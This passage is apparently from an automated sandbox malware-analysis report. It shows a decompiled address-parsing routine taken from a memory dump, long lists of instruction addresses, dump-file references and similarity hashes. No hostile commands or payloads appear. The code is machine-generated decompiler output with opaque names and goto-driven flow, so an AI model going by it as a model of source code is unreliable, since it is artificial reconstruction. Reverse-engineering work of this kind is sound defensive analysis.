                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _v8 + 1;
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                            					if(_v20 != 1) {
                                                                                                                                                            						if(_v20 != 2) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            						L65:
                                                                                                                                                            						_t105 = _v28;
                                                                                                                                                            						if(_t105 != 0) {
                                                                                                                                                            							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                            							E021E8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                            							_t110 = 8;
                                                                                                                                                            							E021DDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                            						if(_v16 > 3) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						_t114 = E0220EE02(_v24, 0, 0xa);
                                                                                                                                                            						_t170 = _t170 + 0xc;
                                                                                                                                                            						if(_t114 > 0xff) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                            						goto L65;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v16 > 4) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_t115 = E0220EE02(_v24, 0, 0x10);
                                                                                                                                                            					_t170 = _t170 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                            					goto L65;
                                                                                                                                                            				} else {
                                                                                                                                                            					goto L29;
                                                                                                                                                            				}
                                                                                                                                                            			}

























                                                                                                                                                            0x0220fcd1
                                                                                                                                                            0x0220fcd6
                                                                                                                                                            0x0220fcd9
                                                                                                                                                            0x0220fcdc
                                                                                                                                                            0x0220fcdf
                                                                                                                                                            0x0220fce2
                                                                                                                                                            0x0220fce5
                                                                                                                                                            0x0220fce8
                                                                                                                                                            0x0220fceb
                                                                                                                                                            0x0220fced
                                                                                                                                                            0x0220fced
                                                                                                                                                            0x0220fcf3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fcfc
                                                                                                                                                            0x0220fcfe
                                                                                                                                                            0x0220fdc1
                                                                                                                                                            0x0223ecbd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eccc
                                                                                                                                                            0x0223eccc
                                                                                                                                                            0x0223ecd2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ecdf
                                                                                                                                                            0x0223ece0
                                                                                                                                                            0x0223ece4
                                                                                                                                                            0x0223eceb
                                                                                                                                                            0x0223ecee
                                                                                                                                                            0x0223eca8
                                                                                                                                                            0x0223eca8
                                                                                                                                                            0x0223ecaa
                                                                                                                                                            0x0220fd76
                                                                                                                                                            0x0220fd79
                                                                                                                                                            0x0220fdb4
                                                                                                                                                            0x0220fdb5
                                                                                                                                                            0x0220fdb6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fdb6
                                                                                                                                                            0x0220fd7e
                                                                                                                                                            0x0223ecfc
                                                                                                                                                            0x0220fe2f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fe2f
                                                                                                                                                            0x0223ed08
                                                                                                                                                            0x0223ed0f
                                                                                                                                                            0x0223ed17
                                                                                                                                                            0x0223ed1b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed1b
                                                                                                                                                            0x0220fd88
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd94
                                                                                                                                                            0x0220fd99
                                                                                                                                                            0x0220fda1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fdb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fdb0
                                                                                                                                                            0x0223ecbd
                                                                                                                                                            0x0220fdc7
                                                                                                                                                            0x0220fdcb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fdd7
                                                                                                                                                            0x0220fde3
                                                                                                                                                            0x0220fe06
                                                                                                                                                            0x02221fe7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02221fef
                                                                                                                                                            0x02221ff0
                                                                                                                                                            0x02221ff4
                                                                                                                                                            0x02221ff7
                                                                                                                                                            0x02221ffa
                                                                                                                                                            0x02221ffd
                                                                                                                                                            0x02222000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ecf1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ecf1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fe06
                                                                                                                                                            0x0220fde8
                                                                                                                                                            0x0220fdec
                                                                                                                                                            0x0220fdef
                                                                                                                                                            0x0220fdf2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fdf2
                                                                                                                                                            0x0220fdcb
                                                                                                                                                            0x0220fd04
                                                                                                                                                            0x0220fd05
                                                                                                                                                            0x0223ec67
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ec6f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ec6f
                                                                                                                                                            0x0220fd13
                                                                                                                                                            0x0220fd3c
                                                                                                                                                            0x0220fd40
                                                                                                                                                            0x0223ec75
                                                                                                                                                            0x0223ec7a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ec8a
                                                                                                                                                            0x0223ec8a
                                                                                                                                                            0x0223ec90
                                                                                                                                                            0x0223ecb2
                                                                                                                                                            0x0220fd73
                                                                                                                                                            0x0220fd73
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd73
                                                                                                                                                            0x0223ec95
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eca1
                                                                                                                                                            0x0223eca4
                                                                                                                                                            0x0223eca5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eca5
                                                                                                                                                            0x0223ec7a
                                                                                                                                                            0x0220fd4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd6e
                                                                                                                                                            0x0220fd6e
                                                                                                                                                            0x0220fd71
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd71
                                                                                                                                                            0x0220fd4a
                                                                                                                                                            0x0220fd21
                                                                                                                                                            0x0221a3a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0221a3a1
                                                                                                                                                            0x0220fd36
                                                                                                                                                            0x0222200b
                                                                                                                                                            0x02222012
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02222018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02222018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd36
                                                                                                                                                            0x0220fe0f
                                                                                                                                                            0x0220fe16
                                                                                                                                                            0x0221a3ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0221a3b3
                                                                                                                                                            0x0221a3b3
                                                                                                                                                            0x0220fe1f
                                                                                                                                                            0x0223ed25
                                                                                                                                                            0x0223ed86
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed91
                                                                                                                                                            0x0223ed95
                                                                                                                                                            0x0223ed95
                                                                                                                                                            0x0223ed9a
                                                                                                                                                            0x0223edad
                                                                                                                                                            0x0223edb3
                                                                                                                                                            0x0223edba
                                                                                                                                                            0x0223edc4
                                                                                                                                                            0x0223edc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223edcc
                                                                                                                                                            0x0223ed2a
                                                                                                                                                            0x0223ed55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed61
                                                                                                                                                            0x0223ed66
                                                                                                                                                            0x0223ed6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed7d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed7d
                                                                                                                                                            0x0223ed30
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed3c
                                                                                                                                                            0x0223ed43
                                                                                                                                                            0x0223ed4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3965848254-0
                                                                                                                                                            • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                            • Instruction ID: 6d3a3a06027a703999b558ef3010632a9e5f283ecfd2ba0512e53f874ff237a3
                                                                                                                                                            • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                            • Instruction Fuzzy Hash: 0191B371D6020AEEDF34CFD4C9847AEB7B5FF45308F20846AD805A759AEB704685CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%